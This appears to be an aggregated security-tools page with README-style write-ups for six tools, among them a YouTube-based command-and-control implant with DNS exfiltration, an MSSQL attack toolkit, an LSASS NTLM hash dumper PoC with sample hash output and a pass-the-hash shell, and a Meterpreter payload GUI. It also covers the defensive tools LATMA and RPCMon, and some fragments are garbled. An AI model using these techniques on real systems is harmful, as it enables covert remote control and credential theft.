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SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube

By: Zion3R

SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.

The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.

It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.


Run the listener in your Windows system:

It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:

After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:

This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:

Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:

As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.


There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:

  • channel_id (Mandatory!!!): Get your Youtube channel ID from here.
  • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
  • payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.
  • payload_aes_iv (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.
  • seconds_delay (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.
  • debug_console (Optional. Default: true): Show debug messages in console or not.
  • log_to_file (Optional. Default: true): Write debug messages in log file or not.
  • log_file (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.
  • dns_exfiltration (Optional. Default: true): Exfiltrate command responses through DNS or not.
  • dns_hostname (Optional. Default: ""): DNS hostname to exfiltrate the response from commands executed in the system.

Generating videos with QR codes

You can generate the videos from Windows using Python3. For that, first install the dependencies:

pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus

Then run the script:

python -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]
  • TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.

  • FILE (-f) is the path where the video is generated.

  • COMMAND (-c) is the command to execute in the system.

  • AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.

  • AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.


Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:

python -t qr -f c:\temp\whoami.avi -c whoami

Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:

python -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000

Running it as a service

You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.

It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:

InstallUtil.exe SharpCovertTube_Service.exe

You can then start it with:

net start "SharpCovertTube Service"

In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.

  • File must be 64 bits!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who at the same time borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!

  • This project is a port from covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about Casbaneiro and Numando malwares.

PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

By: Zion3R

PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .


All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]


PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:


View global options:

pysqlrecon --help

View command specific options:

pysqlrecon [GLOBAL_OPTS] COMMAND --help

Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

--link and --impersonate and incompatible.


pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

git clone
cd pysqlrecon
poetry install
poetry run pysqlrecon --help

Adding a Command

PySQLRecon is easily extensible - see the template and instructions in resources


  • Add SQLRecon SCCM commands
  • Add Azure SQL DB support?

References and Credits

DragonCastle - A PoC That Combines AutodialDLL Lateral Movement Technique And SSP To Scrape NTLM Hashes From LSASS Process

A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.


Upload a DLL to the target machine. Then it enables remote registry to modify AutodialDLL entry and start/restart BITS service. Svchosts would load our DLL, set again AutodiaDLL to default value and perform a RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.

The DLLMain always returns False so the processes doesn't keep it.


It only works when RunAsPPL is not enabled. Also I only added support to decrypt 3DES because I am lazy, but should be easy peasy to add code for AES. By the same reason, I only implemented support for next Windows versions:

Build Support
Windows 10 version 21H2
Windows 10 version 21H1 Implemented
Windows 10 version 20H2 Implemented
Windows 10 version 20H1 (2004) Implemented
Windows 10 version 1909 Implemented
Windows 10 version 1903 Implemented
Windows 10 version 1809 Implemented
Windows 10 version 1803 Implemented
Windows 10 version 1709 Implemented
Windows 10 version 1703 Implemented
Windows 10 version 1607 Implemented
Windows 10 version 1511
Windows 10 version 1507
Windows 8
Windows 7

The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.


credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -local-dll dll to plant DLL location (local) that will be planted on target -remote-dll dll location Path used to update AutodialDLL registry value" dir="auto">
psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 -h                                                                                                                                            
DragonCastle - @TheXC3LL

usage: [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]

DragonCastle - A credential dumper (@TheXC3LL)

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid doma in name
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
</ pre>


Windows server on and Domain Controller on

psyconauta@insulanova:~/Research/dragoncastle|β‡’  python3 -u vagrant -p 'vagrant' -d WINTERFELL -target-ip -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll                          
DragonCastle - @TheXC3LL

[+] Connecting to
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:

User: vagrant
User: vagrant
User: eddard.stark
NTLM: d977 b98c6c9282c5c478be1d97b237b8
User: eddard.stark
NTLM: d977b98c6c9282c5c478be1d97b237b8
User: vagrant
NTLM: e02bc503339d51f71d913c245d35b50b
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590

[+] Deleting DLL

[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle|β‡’ -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@          
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>whoami /priv


Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivile ge Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege En able computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled



Juan Manuel FernΓ‘ndez (@TheXC3LL)


LATMA - Lateral Movement Analyzer Tool

Lateral movement analyzer (LATMA) collects authentication logs from the domain and searches for potential lateral movement attacks and suspicious activity. The tool visualizes the findings with diagrams depicting the lateral movement patterns. This tool contains two modules, one that collects the logs and one that analyzes them. You can execute each of the modules separately, the event log collector should be executed in a Windows machine in an active directory domain environment with python 3.8 or above. The analyzer can be executed in a linux machine and a Windows machine.

The Collector

The Event Log Collector module scans domain controllers for successful NTLM authentication logs and endpoints for successful Kerberos authentication logs. It requires LDAP/S port 389 and 636 and RPC port 135 access to the domain controller and clients. In addition it requires domain admin privileges or a user in the Event log Reader group or one with equivalent permissions. This is required to pull event logs from all endpoints and domain controllers.

The collector gathers NTLM logs from event 8004 on the domain controllers and Kerberos logs from event 4648 on the clients. It generates as an output a csv comma delimited format file with all the available authentication traffic. The output contains the fields source host, destination, username, auth type, SPN and timestamps in the format %Y/%m/%d %H:%M. The collector requires credential of a valid user with event viewer privileges across the environment and queries the specific logs for each protocol.

Verify Kerberos and NTLM protocols are audited across the environment using group policy:

  1. Kerberos - Computer configuration -> policies -> Windows Settings -> Security settings -> Local policies -> Audit Policies -> audit account logon events
  2. NTLM - Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options -> Network Security: Restrict NTLM: audit NTLM authentication in this domain

The Analyzer

The Analyzer receives as input a spreadsheet with authentication data formatted as specified in Collector's output structure. It searches for suspicious activity with the lateral movement analyzer algorithm and also detects additional IoCs of lateral movement. The authentication source and destination should be formalized with netbios name and not ip addresses.

Preliminaries and key concepts of the LATMA algorithm

LATMA gets a batch of authentication requests and sends an alert when it finds suspicious lateral movement attacks. We define the following:

  • Authentication Graph: A directed graph that contains information about authentication traffic in the environment. The nodes of the graphs are computers, and the edges are authentications between the computers. The graph edges have the attributes: protocol type, date of authentication and the account that sent the request. The graph nodes contain information about the computer it represents, detailed below.

  • Lateral movement graph: A sub-graph of the authentication graph that represents the attacker’s movement. The lateral movement graph is not always a path in the sub-graph, in some attacks the attacker goes in many different directions.

  • Alert: A sub-graph the algorithm suspects are part of the lateral movement graph.

LATMA performs several actions during its execution:

  • Information gathering: LATMA monitors normal behavior of the users and machines and characterizes them. The learning is used later to decide which authentication requests deviate from a normal behavior and might be involved in a lateral movement attack. For a learning period of three weeks LATMA does not throw any alerts and only learns the environment. The learning continues after those three weeks.

  • Authentication graph building: After the learning period every relevant authentication is added to the authentication graph. It is critical to filter only for relevant authentication, otherwise the number of edges the graph holds might be too big. We filter on the following protocol types: NTLM and Kerberos with the services β€œrpc”, β€œrpcss” and β€œtermsrv.”

Alert handling:

Adding an authentication to the graph might trigger a process of alerting. In general, a new edge can create a new alert, join an existing alert or merge two alerts.

Information gathering

Every authentication request monitored by LATMA is used for learning and stored in a dedicated data structure. First, we identify sinks and hubs. We define sinks as machines accessed by many (at least 50) different accounts, such as a company portal or exchange server. We define hubs as machines many different accounts (at least 20) authenticate from, such as proxies and VPNs. Authentications to sinks or from hubs are considered benign and are therefore removed from the authentication graph.

In addition to basic classification, LATMA matches between accounts and machines they frequently authenticate from. If an account authenticates from a machine at least three different days in a three weeks’ period, it means that this account matches the machine and any authentication of this account from the machine is considered benign and removed from the authentication graph.

The lateral movement IoCs are:

Whiteβ€― cane β€―- User accounts authenticating from a single machine to multiple ones in a relatively short time.

Bridge - User account X authenticating from machine A to machine B and following that, from machine B to machine C. This IoC potentially indicates an attacker performing actual advance from its initial foothold (A) to destination machine that better serves the attack’s objectives.

Switched Bridge - User account X authenticating from machine A to machine B, followed by user account Y authenticating from machine B to machine C. This IoC potentially indicates an attacker that discovers and compromises an additional account along its path and uses the new account to advance forward (a common example is account X being a standard domain user and account Y being a admin user)

Weight Shift - White cane (see above) from machine A to machines {B1,…, Bn}, followed by another White cane from machine Bx to machines {C1,…,Cn}. This IoC potentially indicates an attacker that has determined that machine B would better serve the attack’s purposes from now on uses machine B as the source for additional searches.

Blast - User account X authenticating from machine A to multiple machines in a very short timeframe. A common example is an attacker that plants \ executes ransomware on a mass number of machines simultaneously


The analyzer outputs several different files

  1. A spreadsheet with all the suspected authentications (all_authentications.csv) and their role classification and a different spreadsheet for the authentications that are suspected to be part of lateral movement (propagation.csv)
  2. A GIF file represents the progression, wherby each frame of the GIF specifies exactly what was the suspicious action
  3. An interactive timeline with all the suspicious events. Events that are related to each other have the same color


  1. Python 3.8
  2. libraries as follows in requirements.txt
  3. Run pip install . for running setup automatically
  4. Audit Kerberos and NTLM across the environment
  5. LDAP queries to the domain controllers
  6. Domain admin credentials or any credentials with MS-EVEN6 remote event viewer permissions.


The Collector

Required arguments:

  1. credentials []username[:password] credentials format alternatively []username and then password will be prompted securely. For domain please insert the FQDN (Fully Quallified Domain Name). Optional arguments:
  2. -ntlm Retrieve ntlm authentication logs from DC
  3. -kerberos Retrieve kerberos authentication logs from all computers in the domain
  4. -debug Turn DEBUG output ON
  5. -help show this help message and exit
  6. -filter Query specific ou or container in the domain, will result all workstations in the sub-OU as well. Each OU will be in format of DN (Distinguished Name). Supports multiple OUs with a semicolon delimiter. Example: OU=subunit,OU=unit;OU=anotherUnit,DC=domain,DC=com Example: CN=container,OU=unit;OU=anotherUnit,DC=domain,DC=com
  7. -date Starting date to collect event logs from. month-day-year format, if not specified take all available data
  8. -threads amount of working threads to use
  9. -ldap Use Unsecure LDAP instead of LDAP/S
  10. -ldap_domain Custom domain on ldap login credentials. If empty, will use current user's session domain

The Analyzer

Required arguments:

  1. authentication_file authentication file should contain list of NTLM and Kerberos requests

Optional arguments: 2. -output_file The location the csv with the all the IOCs is going to be saved to 3. -progression_output_file The location the csv with the the IOCs of the lateral movements is going to be save to 4. -sink_threshold number of accounts from which a machine is considered sink, default is 50 5. -hub_threshold number of accounts from which a machine is considered hub, default is 20 6. -learning_period learning period in days, default is 7 days 7. -show_all_iocs Show IoC that are not connected to any other IoCs 8. -show_gant If true, output the events in a gant format

Binary Usage Open command prompt and navigate to the binary folder. Run executables with the specified above arguments.


In the example files you have several samples of real environments (some contain lateral movement attacks and some don't) which you can give as input for the analyzer.

Usage example

  1. python -ntlm -kerberos
  2. python logs.csv

RPCMon - RPC Monitor Tool Based On Event Tracing For Windows

A GUI tool for scanning RPC communication through Event Tracing for Windows (ETW). The tool was published as part of a research on RPC communication between the host and a Windows container.


RPCMon can help researchers to get a high level view over an RPC communication between processes. It was built like Procmon for easy usage, and uses James Forshaw .NET library for RPC. RPCMon can show you the RPC functions being called, the process who called them, and other relevant information.
RPCMon uses a hardcoded RPC dictionary for fast RPC information processing which contains information about RPC modules. It also has an option to build an RPC database so it will be updated from your computer in case some details are missing in the hardcoded RPC dictionary.


Double click the EXE binary and you will get the GUI Windows.
RPCMon needs a DB to be able to get the details on the RPC functions, without a DB you will have missing information.
To load the DB, press on DB -> Load DB... and choose your DB. You can a DB we added to this project: /DB/RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json.


  • A detailed overview of RPC functions activity.
  • Build an RPC database to parse RPC modules or use hardcoded database.
  • Filter\highlight rows based on cells.
  • Bold specific rows.


We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get the RPC functions.


Copyright (c) 2022 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.


For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.

Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.

Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.



You can install Kage binaries from here.

for developers

to run the app from source code:

# Download source code
git clone

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

For Generating APK Payload select Raw format in dropdown list.



I will not be responsible for any direct or indirect damage caused due to the usage of this tool, it is for educational purposes only.

Twitter: @iFalah



Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)

electron-vue - (c) Greg Holguin. 2016 (MIT)

This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.
